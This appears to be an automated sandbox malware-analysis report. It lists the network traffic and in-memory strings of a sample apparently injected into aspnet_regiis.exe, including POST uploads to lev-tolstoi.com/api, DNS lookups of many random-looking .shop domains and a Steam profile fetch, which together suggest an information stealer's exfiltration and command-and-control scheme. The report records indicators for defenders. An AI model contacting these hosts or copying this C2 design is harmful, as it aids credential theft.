                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1285Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588389Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: weaknessmznxo.shop
                Source: global trafficDNS traffic detected: DNS query: potentioallykeos.shop
                Source: global trafficDNS traffic detected: DNS query: interactiedovspm.shop
                Source: global trafficDNS traffic detected: DNS query: charecteristicdxp.shop
                Source: global trafficDNS traffic detected: DNS query: cagedwifedsozm.shop
                Source: global trafficDNS traffic detected: DNS query: deicedosmzj.shop
                Source: global trafficDNS traffic detected: DNS query: southedhiscuso.shop
                Source: global trafficDNS traffic detected: DNS query: consciousourwi.shop
                Source: global trafficDNS traffic detected: DNS query: weiggheticulop.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1966091168.0000000005003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQ
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002B8F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C15000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1866856303.000000000500F000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1867108494.0000000004FF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1780046753.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1741575094.0000000002C1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000002.00000003.1968573576.0000000002C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/-
                Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/9
                Source: aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/;~
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/P
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api(
                Source: aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiH
                Source: aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apial
                Source: aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apidows6$
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/h
                Source: aspnet_regiis.exe, 00000002.00000002.2310585702.0000000004FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: aspnet_regiis.exe, 00000002.00000003.2021686347.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965527761.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1964908973.0000000002C08000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1965112088.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sj
                Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/yo
                Source: aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
